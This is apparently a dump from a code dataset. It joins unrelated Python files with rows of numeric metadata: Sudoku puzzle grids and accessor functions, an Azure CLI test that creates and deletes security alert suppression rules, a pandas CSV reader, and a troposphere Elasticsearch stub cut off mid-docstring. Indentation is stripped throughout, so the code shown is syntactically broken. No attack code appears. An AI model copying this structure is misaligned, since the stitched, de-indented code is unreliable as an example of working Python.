[5,0,9,6,0,1,0,8,0],
[0,8,2,0,4,0,0,0,5],
[0,0,3,0,0,0,0,0,0],
[0,1,0,8,0,7,0,2,0],
[0,0,0,0,0,0,5,0,0],
[7,0,0,0,9,0,6,5,0],
[0,5,0,4,0,6,7,0,8],
[0,3,6,5,0,0,0,0,0]]
sudoku8 = [ [4,0,0,0,0,1,3,0,0],
[0,2,0,0,3,0,0,7,6],
[0,0,0,0,0,9,0,4,8],
[0,6,0,0,0,7,2,5,0],
[0,1,0,0,4,0,0,3,0],
[0,5,7,3,0,0,0,9,0],
[6,7,0,1,0,0,0,0,0],
[1,9,0,0,5,0,0,6,0],
[0,0,5,8,0,0,0,0,3]]
sudoku9 = [ [5,0,0,0,4,7,0,8,0],
[0,7,0,5,0,0,0,0,0],
[9,0,8,0,6,0,0,2,5],
[0,2,0,0,0,3,0,0,0],
[7,0,0,8,0,6,0,0,3],
[0,0,0,9,0,0,0,4,0],
[2,1,0,0,3,0,8,0,6],
[0,0,0,0,0,9,0,5,0],
[0,8,0,1,2,0,0,0,7]]
sudoku10 = [[3,2,0,0,8,0,0,0,1],
[0,5,0,0,0,0,0,0,9],
[8,9,1,0,7,0,3,0,0],
[5,1,0,0,4,0,0,0,0],
[0,0,0,7,0,3,0,0,0],
[0,0,0,0,6,0,0,9,4],
[0,0,8,0,3,0,9,4,6],
[4,0,0,0,0,0,0,8,0],
[9,0,0,0,1,0,0,5,3]]
sudoku11 = [[2,0,0,0,0,1,0,6,8],
[1,8,4,0,0,0,0,0,0],
[7,0,0,0,0,2,9,0,0],
[0,4,1,0,2,0,0,7,0],
[0,0,7,0,0,0,8,0,0],
[0,6,0,0,3,0,1,5,0],
[0,0,5,2,0,0,0,0,4],
[0,0,0,0,0,0,2,8,7],
[4,9,0,3,0,0,0,0,6]]
sudoku12 = [[6,1,0,0,0,9,0,0,2],
[0,0,0,2,0,0,0,0,5],
[0,0,5,1,6,4,8,0,0],
[2,3,0,0,0,5,1,0,0],
[0,0,0,0,0,0,0,0,0],
[0,0,9,3,0,0,0,4,8],
[0,0,6,9,1,8,5,0,0],
[5,0,0,0,0,3,0,0,0],
[8,0,0,7,0,0,0,9,6]]
sudoku13 = [[0,0,0,0,2,8,0,0,0],
[0,7,0,9,4,0,0,1,6],
[6,0,0,0,0,0,2,0,8],
[0,3,0,0,6,2,0,0,0],
[0,0,2,4,0,7,9,0,0],
[0,0,0,3,9,0,0,7,0],
[1,0,7,0,0,0,0,0,4],
[5,2,0,0,3,4,0,8,0],
[0,0,0,7,8,0,0,0,0]]
sudoku14 = [[0,0,4,9,0,0,0,2,0],
[5,2,0,6,0,0,0,0,7],
[0,3,0,0,0,0,0,4,6],
[8,0,0,3,7,0,2,0,0],
[0,0,5,0,6,0,4,0,0],
[0,0,2,0,5,9,0,0,8],
[4,1,0,0,0,0,0,8,0],
[2,0,0,0,0,1,0,6,9],
[0,6,0,0,0,3,7,0,0]]
sudoku15 = [[0,6,8,0,0,9,0,0,0],
[0,1,0,0,6,0,0,5,0],
[7,0,0,5,0,1,8,0,0],
[6,0,2,0,4,0,0,7,5],
[0,0,0,0,0,0,0,0,0],
[3,5,0,0,1,0,2,0,9],
[0,0,5,3,0,6,0,0,1],
[0,9,0,0,2,0,0,3,0],
[0,0,0,1,0,0,7,9,0]]
sudoku16 = [[0,0,0,4,0,2,8,1,6],
[0,0,0,8,6,7,0,2,0],
[0,0,6,0,0,0,0,0,0],
[7,0,5,6,0,0,0,0,0],
[9,0,0,3,0,5,0,0,1],
[0,0,0,0,0,4,2,0,9],
[0,0,0,0,0,0,4,0,0],
[0,7,0,9,1,3,0,0,0],
[6,5,2,7,0,8,0,0,0]]
sudoku17 = [[0,6,0,1,0,0,2,0,0],
[0,3,0,0,2,4,6,0,7],
[0,0,2,0,0,0,0,0,8],
[0,0,0,0,0,0,5,0,4],
[0,7,8,2,0,6,9,3,0],
[3,0,1,0,0,0,0,0,0],
[6,0,0,0,0,0,3,0,0],
[2,0,3,9,7,0,0,1,0],
[0,0,4,0,0,8,0,2,0]]
sudoku18 = [[0,4,0,9,0,6,0,0,0],
[0,0,8,0,0,0,4,7,1],
[0,7,3,0,1,0,0,6,2],
[0,0,4,0,0,3,0,1,0],
[0,0,0,0,0,0,0,0,0],
[0,1,0,6,0,0,8,0,0],
[1,9,0,0,3,0,2,4,0],
[3,2,5,0,0,0,7,0,0],
[0,0,0,5,0,2,0,9,0]]
sudoku19 = [[0,2,8,0,0,0,0,0,9],
[0,0,4,0,0,2,8,3,0],
[0,9,0,8,0,6,0,0,0],
[0,0,6,0,0,8,0,7,0],
[0,3,0,4,0,7,0,2,0],
[0,4,0,6,0,0,9,0,0],
[0,0,0,2,0,1,0,8,0],
[0,6,2,7,0,0,1,0,0],
[3,0,0,0,0,0,2,4,0]]
sudoku20 = [[0,0,7,3,0,0,8,0,0],
[8,0,3,1,5,0,0,9,0],
[0,0,1,6,0,0,0,0,0],
[7,9,0,0,0,0,2,1,6],
[0,0,0,0,0,0,0,0,0],
[1,8,2,0,0,0,0,3,4],
[0,0,0,0,0,5,4,0,0],
[0,5,0,0,2,8,1,0,3],
[0,0,4,0,0,3,9,0,0]]
sudoku21 = [[1,3,4,5,0,6,0,9,0],
[0,0,0,0,0,9,0,0,0],
[6,9,0,0,7,1,0,0,0],
[4,0,3,0,0,0,1,0,0],
[0,1,0,0,0,0,0,7,0],
[0,0,2,0,0,0,5,0,4],
[0,0,0,1,9,0,0,4,6],
[0,0,0,8,0,0,0,0,0],
[0,5,0,7,0,3,9,8,1]]
sudoku22 = [[1,0,3,0,0,2,7,8,0],
[0,0,0,0,0,3,2,0,0],
[0,4,6,0,7,5,0,0,1],
[0,0,1,0,0,0,8,0,4],
[0,0,0,0,0,0,0,0,0],
[7,0,8,0,0,0,5,0,0],
[6,0,0,9,4,0,1,5,0],
[0,0,9,3,0,0,0,0,0],
[0,1,4,7,0,0,3,0,9]]
sudoku23 = [[0,0,7,0,5,0,0,2,9],
[4,9,0,0,0,0,7,6,0],
[0,0,0,0,1,0,0,0,0],
[1,3,0,5,0,0,0,7,0],
[0,7,4,0,0,0,8,3,0],
[0,8,0,0,0,3,0,1,2],
[0,0,0,0,4,0,0,0,0],
[0,4,9,0,0,0,0,8,6],
[7,5,0,0,9,0,1,0,0]]
sudoku24 = [[0,1,0,0,7,0,0,0,0],
[0,7,6,9,0,0,8,5,3],
[0,0,0,3,0,4,0,0,0],
[0,6,7,0,5,0,2,0,9],
[0,0,0,0,0,0,0,0,0],
[1,0,8,0,9,0,7,4,0],
[0,0,0,1,0,7,0,0,0],
[2,8,1,0,0,9,4,6,0],
[0,0,0,0,2,0,0,9,0]]
sudoku25 = [[0,5,0,0,0,2,0,0,9],
[0,0,0,0,1,9,0,0,7],
[0,0,8,3,4,0,0,0,0],
[0,0,0,4,0,0,0,9,3],
[7,0,3,9,2,8,4,0,5],
[9,6,0,0,0,5,0,0,0],
[0,0,0,0,9,3,8,0,0],
[2,0,0,7,6,0,0,0,0],
[3,0,0,8,0,0,0,1,0]]
sudoku26 = [[0,0,0,2,8,0,0,0,0],
[4,9,0,0,0,5,0,2,0],
[0,0,2,0,0,0,5,3,7],
[9,0,0,0,0,8,0,7,0],
[0,0,7,1,0,2,4,0,0],
[0,8,0,3,0,0,0,0,6],
[7,4,6,0,0,0,9,0,0],
[0,1,0,5,0,0,0,6,3],
[0,0,0,0,7,1,0,0,0]]
sudoku27 = [[0,0,7,0,0,0,0,0,0],
[1,0,9,5,6,0,0,0,0],
[0,5,0,0,0,8,0,0,2],
[8,3,2,0,0,6,1,0,0],
[7,4,0,0,0,0,0,9,6],
[0,0,6,2,0,0,4,8,3],
[2,0,0,9,0,0,0,5,0],
[0,0,0,0,4,7,6,0,8],
[0,0,0,0,0,0,3,0,0]]
sudoku28 = [[8,0,0,4,5,0,7,0,0],
[0,0,0,0,2,0,3,0,0],
[9,0,7,3,0,8,0,0,2],
[0,6,0,0,0,0,0,0,3],
[0,8,4,0,9,0,2,7,0],
[7,0,0,0,0,0,0,5,0],
[2,0,0,6,0,7,5,0,4],
[0,0,8,0,4,0,0,0,0],
[0,0,5,0,1,3,0,0,9]]
sudoku29 = [[0,5,0,0,8,0,6,4,0],
[0,0,7,0,0,1,9,0,0],
[3,0,0,0,2,9,0,0,1],
[0,0,8,0,0,2,0,7,3],
[0,0,0,0,5,0,0,0,0],
[2,9,0,8,0,0,1,0,0],
[6,0,0,9,1,0,0,0,7],
[0,0,2,3,0,0,4,0,0],
[0,3,1,0,7,0,0,5,0]]
sudoku30 = [[1,0,0,8,5,0,3,0,6],
[0,0,0,0,6,0,0,8,0],
[5,0,8,0,0,4,0,0,9],
[0,0,0,3,0,0,0,0,1],
[0,9,1,0,0,0,2,7,0],
[3,0,0,0,0,2,0,0,0],
[9,0,0,6,0,0,1,0,7],
[0,5,0,0,9,0,0,0,0],
[8,0,7,0,4,3,0,0,2]]
#list containing each sudoku puzzle before any modifications
sudoList_Non_NP = [sudoku1, sudoku2,sudoku3,sudoku4,sudoku5,sudoku6,sudoku7,
sudoku8,sudoku9,sudoku10,sudoku11,sudoku12,sudoku13,sudoku14,
sudoku15,sudoku16,sudoku17,sudoku18,sudoku19,sudoku20,
sudoku21,sudoku22,sudoku23,sudoku24,sudoku25,sudoku26,
sudoku27,sudoku28,sudoku29,sudoku30]
"""
Creates deepcopy of sudoku puzzles that can be modified and reset
Python by default creates Shallow copies, this solves issues with
Satisfyability.py where when solving a puzzle again the initial puzzle
was already the solved puzzle
"""
copy_sudoku_lists = []
for i in sudoList_Non_NP:
copy_sudoku_lists.append(copy.deepcopy(i))
sudo1=np.reshape(sudoku1,(9,9))
sudo2=np.reshape(sudoku2,(9,9))
sudo3=np.reshape(sudoku3,(9,9))
sudo4=np.reshape(sudoku4,(9,9))
sudo5=np.reshape(sudoku5,(9,9))
sudo6=np.reshape(sudoku6,(9,9))
sudo7=np.reshape(sudoku7,(9,9))
sudo8=np.reshape(sudoku8,(9,9))
sudo9=np.reshape(sudoku9,(9,9))
sudo10=np.reshape(sudoku10,(9,9))
sudo11=np.reshape(sudoku11,(9,9))
sudo12=np.reshape(sudoku12,(9,9))
sudo13=np.reshape(sudoku13,(9,9))
sudo14=np.reshape(sudoku14,(9,9))
sudo15=np.reshape(sudoku15,(9,9))
sudo16=np.reshape(sudoku16,(9,9))
sudo17=np.reshape(sudoku17,(9,9))
sudo18=np.reshape(sudoku18,(9,9))
sudo19=np.reshape(sudoku19,(9,9))
sudo20=np.reshape(sudoku20,(9,9))
sudo21=np.reshape(sudoku21,(9,9))
sudo22=np.reshape(sudoku22,(9,9))
sudo23=np.reshape(sudoku23,(9,9))
sudo24=np.reshape(sudoku24,(9,9))
sudo25=np.reshape(sudoku25,(9,9))
sudo26=np.reshape(sudoku26,(9,9))
sudo27=np.reshape(sudoku27,(9,9))
sudo28=np.reshape(sudoku28,(9,9))
sudo29=np.reshape(sudoku29,(9,9))
sudo30=np.reshape(sudoku30,(9,9))
#Reshaped 9x9 list used for Simulated_Annealing.py
sudoLst=[sudo1,sudo2,sudo3,sudo4,sudo5,sudo6,sudo7,
sudo8,sudo9,sudo10,sudo11,sudo12,sudo13,sudo14,
sudo15,sudo16,sudo17,sudo18,sudo19,sudo20,sudo21,
sudo22,sudo23,sudo24,sudo25,sudo26,sudo27,sudo28,sudo29,sudo30]
#Following functions used for ga.py
def s1():
sudoku1 = [[0,0,0,4,0,0,2,0,0],[7,0,8,5,2,6,0,9,0],[5,0,0,0,1,0,0,0,0],[2,3,5,0,0,0,0,0,1],[0,0,6,0,7,0,4,0,0],[4,0,0,0,0,0,6,3,9],[0,0,0,0,3,0,0,0,7],[0,6,0,1,5,2,9,0,4],[0,0,4,0,0,8,0,0,0]]
return sudoku1
def s2():
sudoku2 = [[0,0,0,0,1,2,8,4,5],[0,1,0,7,0,0,0,3,0],[0,8,0,6,0,9,0,0,0],[2,0,0,0,0,7,4,0,0],[0,0,5,0,0,0,9,0,0],[0,0,8,9,0,0,0,0,2],[0,0,0,1,0,3,0,9,0],[0,3,0,0,0,4,0,8,0],[1,5,9,2,6,0,0,0,0]]
return sudoku2
def s3():
sudoku3 = [[9,8,7,0,0,0,3,0,0],[1,6,0,0,8,0,0,9,0],[0,0,0,0,0,4,1,0,6],[0,2,0,0,0,6,0,0,8],[0,0,0,5,0,7,0,0,0],[3,0,0,9,0,0,0,6,0],[2,0,8,4,0,0,0,0,0],[0,7,0,0,1,0,0,5,9],[0,0,5,0,0,0,8,2,3]]
return sudoku3
def s4():
sudoku4 = [[0,1,6,0,0,0,0,3,0],[8,0,0,9,0,0,2,0,6],[0,0,0,0,0,0,0,5,8],[0,7,2,4,0,6,0,0,0],[0,6,9,0,7,0,4,2,0],[0,0,0,3,0,5,9,6,0],[1,3,0,0,0,0,0,0,0],[6,0,4,0,0,1,0,0,5],[0,2,0,0,0,0,8,1,0]]
return sudoku4
def s5():
sudoku5 = [[0,3,0,6,0,5,0,8,0],[7,0,0,3,0,0,0,0,0],[0,0,0,9,7,0,5,4,0],[0,6,7,0,0,0,3,0,8],[0,2,0,0,0,0,0,6,0],[4,0,9,0,0,0,7,5,0],[0,9,5,0,3,4,0,0,0],[0,0,0,0,0,7,0,0,2],[0,7,0,1,0,6,0,9,0]]
return sudoku5
def s6():
sudoku6 = [[1,0,0,5,0,6,0,9,0],[0,3,0,0,8,0,4,0,0],[6,0,0,0,7,0,1,0,2],[0,0,0,0,0,7,0,2,4],[7,0,0,0,9,0,0,0,8],[9,2,0,6,0,0,0,0,0],[3,0,2,0,5,0,0,0,6],[0,0,1,0,6,0,0,5,0],[0,9,0,8,0,1,0,0,7]]
return sudoku6
def s7():
sudoku7 = [[0,0,0,0,0,5,1,7,0],[5,0,9,6,0,1,0,8,0],[0,8,2,0,4,0,0,0,5],[0,0,3,0,0,0,0,0,0],[0,1,0,8,0,7,0,2,0],[0,0,0,0,0,0,5,0,0],[7,0,0,0,9,0,6,5,0],[0,5,0,4,0,6,7,0,8],[0,3,6,5,0,0,0,0,0]]
return sudoku7
def s8():
sudoku8 = [[4,0,0,0,0,1,3,0,0],[0,2,0,0,3,0,0,7,6],[0,0,0,0,0,9,0,4,8],[0,6,0,0,0,7,2,5,0],[0,1,0,0,4,0,0,3,0],[0,5,7,3,0,0,0,9,0],[6,7,0,1,0,0,0,0,0],[1,9,0,0,5,0,0,6,0],[0,0,5,8,0,0,0,0,3]]
return sudoku8
def s9():
sudoku9 = [[5,0,0,0,4,7,0,8,0],[0,7,0,5,0,0,0,0,0],[9,0,8,0,6,0,0,2,5],[0,2,0,0,0,3,0,0,0],[7,0,0,8,0,6,0,0,3],[0,0,0,9,0,0,0,4,0],[2,1,0,0,3,0,8,0,6],[0,0,0,0,0,9,0,5,0],[0,8,0,1,2,0,0,0,7]]
return sudoku9
def s10():
sudoku10 = [[3,2,0,0,8,0,0,0,1],[0,5,0,0,0,0,0,0,9],[8,9,1,0,7,0,3,0,0],[5,1,0,0,4,0,0,0,0],[0,0,0,7,0,3,0,0,0],[0,0,0,0,6,0,0,9,4],[0,0,8,0,3,0,9,4,6],[4,0,0,0,0,0,0,8,0],[9,0,0,0,1,0,0,5,3]]
return sudoku10
def s11():
sudoku11 = [[2,0,0,0,0,1,0,6,8],[1,8,4,0,0,0,0,0,0],[7,0,0,0,0,2,9,0,0],[0,4,1,0,2,0,0,7,0],[0,0,7,0,0,0,8,0,0],[0,6,0,0,3,0,1,5,0],[0,0,5,2,0,0,0,0,4],[0,0,0,0,0,0,2,8,7],[4,9,0,3,0,0,0,0,6]]
return sudoku11
def s12():
sudoku12 = [[6,1,0,0,0,9,0,0,2],[0,0,0,2,0,0,0,0,5],[0,0,5,1,6,4,8,0,0],[2,3,0,0,0,5,1,0,0],[0,0,0,0,0,0,0,0,0],[0,0,9,3,0,0,0,4,8],[0,0,6,9,1,8,5,0,0],[5,0,0,0,0,3,0,0,0],[8,0,0,7,0,0,0,9,6]]
return sudoku12
def s13():
sudoku13 = [[0,0,0,0,2,8,0,0,0],[0,7,0,9,4,0,0,1,6],[6,0,0,0,0,0,2,0,8],[0,3,0,0,6,2,0,0,0],[0,0,2,4,0,7,9,0,0],[0,0,0,3,9,0,0,7,0],[1,0,7,0,0,0,0,0,4],[5,2,0,0,3,4,0,8,0],[0,0,0,7,8,0,0,0,0]]
return sudoku13
def s14():
sudoku14 = [[0,0,4,9,0,0,0,2,0],[5,2,0,6,0,0,0,0,7],[0,3,0,0,0,0,0,4,6],[8,0,0,3,7,0,2,0,0],[0,0,5,0,6,0,4,0,0],[0,0,2,0,5,9,0,0,8],[4,1,0,0,0,0,0,8,0],[2,0,0,0,0,1,0,6,9],[0,6,0,0,0,3,7,0,0]]
return sudoku14
def s15():
sudoku15 = [[0,6,8,0,0,9,0,0,0],[0,1,0,0,6,0,0,5,0],[7,0,0,5,0,1,8,0,0],[6,0,2,0,4,0,0,7,5],[0,0,0,0,0,0,0,0,0],[3,5,0,0,1,0,2,0,9],[0,0,5,3,0,6,0,0,1],[0,9,0,0,2,0,0,3,0],[0,0,0,1,0,0,7,9,0]]
return sudoku15
def s16():
sudoku16 =[[0,0,0,4,0,2,8,1,6],[0,0,0,8,6,7,0,2,0],[0,0,6,0,0,0,0,0,0],[7,0,5,6,0,0,0,0,0],[9,0,0,3,0,5,0,0,1],[0,0,0,0,0,4,2,0,9],[0,0,0,0,0,0,4,0,0],[0,7,0,9,1,3,0,0,0],[6,5,2,7,0,8,0,0,0]]
return sudoku16
def s17():
sudoku17 = [[0,6,0,1,0,0,2,0,0],[0,3,0,0,2,4,6,0,7],[0,0,2,0,0,0,0,0,8],[0,0,0,0,0,0,5,0,4],[0,7,8,2,0,6,9,3,0],[3,0,1,0,0,0,0,0,0],[6,0,0,0,0,0,3,0,0],[2,0,3,9,7,0,0,1,0],[0,0,4,0,0,8,0,2,0]]
return sudoku17
def s18():
sudoku18 = [[0,4,0,9,0,6,0,0,0],[0,0,8,0,0,0,4,7,1],[0,7,3,0,1,0,0,6,2],[0,0,4,0,0,3,0,1,0],[0,0,0,0,0,0,0,0,0],[0,1,0,6,0,0,8,0,0],[1,9,0,0,3,0,2,4,0],[3,2,5,0,0,0,7,0,0],[0,0,0,5,0,2,0,9,0]]
return sudoku18
def s19():
sudoku19 = [[0,2,8,0,0,0,0,0,9],[0,0,4,0,0,2,8,3,0],[0,9,0,8,0,6,0,0,0],[0,0,6,0,0,8,0,7,0],[0,3,0,4,0,7,0,2,0],[0,4,0,6,0,0,9,0,0],[0,0,0,2,0,1,0,8,0],[0,6,2,7,0,0,1,0,0],[3,0,0,0,0,0,2,4,0]]
return sudoku19
def s20():
sudoku20 = [[0,0,7,3,0,0,8,0,0],[8,0,3,1,5,0,0,9,0],[0,0,1,6,0,0,0,0,0],[7,9,0,0,0,0,2,1,6],[0,0,0,0,0,0,0,0,0],[1,8,2,0,0,0,0,3,4],[0,0,0,0,0,5,4,0,0],[0,5,0,0,2,8,1,0,3],[0,0,4,0,0,3,9,0,0]]
return sudoku20
def s21():
sudoku21 = [[1,3,4,5,0,6,0,9,0],[0,0,0,0,0,9,0,0,0],[6,9,0,0,7,1,0,0,0],[4,0,3,0,0,0,1,0,0],[0,1,0,0,0,0,0,7,0],[0,0,2,0,0,0,5,0,4],[0,0,0,1,9,0,0,4,6],[0,0,0,8,0,0,0,0,0],[0,5,0,7,0,3,9,8,1]]
return sudoku21
def s22():
sudoku22 = [[1,0,3,0,0,2,7,8,0],[0,0,0,0,0,3,2,0,0],[0,4,6,0,7,5,0,0,1],[0,0,1,0,0,0,8,0,4],[0,0,0,0,0,0,0,0,0],[7,0,8,0,0,0,5,0,0],[6,0,0,9,4,0,1,5,0],[0,0,9,3,0,0,0,0,0],[0,1,4,7,0,0,3,0,9]]
return sudoku22
def s23():
sudoku23 = [[0,0,7,0,5,0,0,2,9],[4,9,0,0,0,0,7,6,0],[0,0,0,0,1,0,0,0,0],[1,3,0,5,0,0,0,7,0],[0,7,4,0,0,0,8,3,0],[0,8,0,0,0,3,0,1,2],[0,0,0,0,4,0,0,0,0],[0,4,9,0,0,0,0,8,6],[7,5,0,0,9,0,1,0,0]]
return sudoku23
def s24():
sudoku24 = [[0,1,0,0,7,0,0,0,0],[0,7,6,9,0,0,8,5,3],[0,0,0,3,0,4,0,0,0],[0,6,7,0,5,0,2,0,9],[0,0,0,0,0,0,0,0,0],[1,0,8,0,9,0,7,4,0],[0,0,0,1,0,7,0,0,0],[2,8,1,0,0,9,4,6,0],[0,0,0,0,2,0,0,9,0]]
return sudoku24
def s25():
sudoku25 = [[0,5,0,0,0,2,0,0,9],[0,0,0,0,1,9,0,0,7],[0,0,8,3,4,0,0,0,0],[0,0,0,4,0,0,0,9,3],[7,0,3,9,2,8,4,0,5],[9,6,0,0,0,5,0,0,0],[0,0,0,0,9,3,8,0,0],[2,0,0,7,6,0,0,0,0],[3,0,0,8,0,0,0,1,0]]
return sudoku25
def s26():
sudoku26 = [[0,0,0,2,8,0,0,0,0],[4,9,0,0,0,5,0,2,0],[0,0,2,0,0,0,5,3,7],[9,0,0,0,0,8,0,7,0],[0,0,7,1,0,2,4,0,0],[0,8,0,3,0,0,0,0,6],[7,4,6,0,0,0,9,0,0],[0,1,0,5,0,0,0,6,3],[0,0,0,0,7,1,0,0,0]]
return sudoku26
def s27():
sudoku27 = [[0,0,7,0,0,0,0,0,0],[1,0,9,5,6,0,0,0,0],[0,5,0,0,0,8,0,0,2],[8,3,2,0,0,6,1,0,0],[7,4,0,0,0,0,0,9,6],[0,0,6,2,0,0,4,8,3],[2,0,0,9,0,0,0,5,0],[0,0,0,0,4,7,6,0,8],[0,0,0,0,0,0,3,0,0]]
return sudoku27
def s28():
sudoku28 = [[8,0,0,4,5,0,7,0,0],[0,0,0,0,2,0,3,0,0],[9,0,7,3,0,8,0,0,2],[0,6,0,0,0,0,0,0,3],[0,8,4,0,9,0,2,7,0],[7,0,0,0,0,0,0,5,0],[2,0,0,6,0,7,5,0,4],[0,0,8,0,4,0,0,0,0],[0,0,5,0,1,3,0,0,9]]
return sudoku28
def s29():
sudoku29 = [[0,5,0,0,8,0,6,4,0],[0,0,7,0,0,1,9,0,0],[3,0,0,0,2,9,0,0,1],[0,0,8,0,0,2,0,7,3],[0,0,0,0,5,0,0,0,0],[2,9,0,8,0,0,1,0,0],[6,0,0,9,1,0,0,0,7],[0,0,2,3,0,0,4,0,0],[0,3,1,0,7,0,0,5,0]]
return sudoku29
def s30():
sudoku30 = [[1,0,0,8,5,0,3,0,6],[0,0,0,0,6,0,0,8,0],[5,0,8,0,0,4,0,0,9],[0,0,0,3,0,0,0,0,1],[0,9,1,0,0,0,2,7,0],[3,0,0,0,0,2,0,0,0],[9,0,0,6,0,0,1,0,7],[0,5,0,0,9,0,0,0,0],[8,0,7,0,4,3,0,0,2]]
return sudoku30
| 34.713024
| 196
| 0.477774
| 5,372
| 15,725
| 1.396873
| 0.031646
| 0.473348
| 0.392591
| 0.285714
| 0.71322
| 0.710821
| 0.709222
| 0.709222
| 0.709222
| 0.709222
| 0
| 0.381191
| 0.110143
| 15,725
| 453
| 197
| 34.713024
| 0.155078
| 0.012273
| 0
| 0.014888
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074442
| false
| 0
| 0.002481
| 0
| 0.151365
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
db1f57f174b876d999325307f94a0ceb8191d823
| 2,800
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import pytest
from azure.cli.testsdk import ScenarioTest
class SecurityCenterAlertsSuppressionRuleTests(ScenarioTest):
def test_security_alerts_suppression_rule(self):
self.kwargs.update({
'rule_name': self.create_random_name(prefix='azurecli-test', length=24)
})
azure_cli_new_suppression_rule = self.cmd('az security alerts-suppression-rule update --rule-name {rule_name} --alert-type "Test" --reason "Other" --comment "Test comment" --state "Enabled"').get_output_in_json()
assert len(azure_cli_new_suppression_rule) > 0
azure_cli_new_suppression_rule = self.cmd('az security alerts-suppression-rule update --rule-name {rule_name} --alert-type "Test2" --reason "Other" --comment "Test comment" --state "Enabled"').get_output_in_json()
assert len(azure_cli_new_suppression_rule) > 0
azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule upsert_scope --rule-name {rule_name} --field "entities.process.commandline" --contains-substring "example"').get_output_in_json()
assert len(azure_cli_new_suppression_rule_scope) > 0
azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule upsert_scope --rule-name {rule_name} --field "entities.account.name" --contains-substring "example"').get_output_in_json()
assert len(azure_cli_new_suppression_rule_scope) > 0
azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule delete_scope --rule-name {rule_name} --field "entities.process.commandline"').get_output_in_json()
assert len(azure_cli_new_suppression_rule_scope) > 0
azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule delete_scope --rule-name {rule_name} --field "entities.account.name"').get_output_in_json()
assert len(azure_cli_new_suppression_rule_scope) > 0
azure_cli_get_suppression_rule = self.cmd('az security alerts-suppression-rule show --rule-name {rule_name}').get_output_in_json()
assert len(azure_cli_get_suppression_rule) > 0
azure_cli_list_suppression_rule = self.cmd('az security alerts-suppression-rule list').get_output_in_json()
assert len(azure_cli_list_suppression_rule) > 0
self.cmd('az security alerts-suppression-rule delete --rule-name {rule_name}')
| 66.666667
| 226
| 0.685357
| 348
| 2,800
| 5.183908
| 0.212644
| 0.216186
| 0.073171
| 0.146341
| 0.786585
| 0.757206
| 0.757206
| 0.757206
| 0.715078
| 0.604213
| 0
| 0.004647
| 0.154643
| 2,800
| 42
| 227
| 66.666667
| 0.757499
| 0.12
| 0
| 0.25
| 0
| 0.25
| 0.397154
| 0.127236
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1ddc641910f7c5a07c3f1e725281830f65923fa
| 208
|
py
|
Python
|
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | 4
|
2019-06-09T13:15:37.000Z
|
2020-12-22T08:37:36.000Z
|
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | null | null | null |
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
class CSVReader(object):
def __init__(self, **read_options):
self.read_options = read_options
def read(self, path):
return pd.read_csv(path, **self.read_options)
| 23.111111
| 53
| 0.682692
| 29
| 208
| 4.586207
| 0.517241
| 0.330827
| 0.338346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211538
| 208
| 9
| 53
| 23.111111
| 0.810976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c0514104c99e0e3050dde1da7c4515e95bb6f183
| 12,875
|
py
|
Python
|
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
from . import AWSObject, AWSProperty
from .validators import *
from .constants import *
# -------------------------------------------
class ElasticsearchElasticsearchClusterConfig(AWSProperty):
"""# ElasticsearchClusterConfig - CloudFormationResourceSpecification version: 1.4.0
{
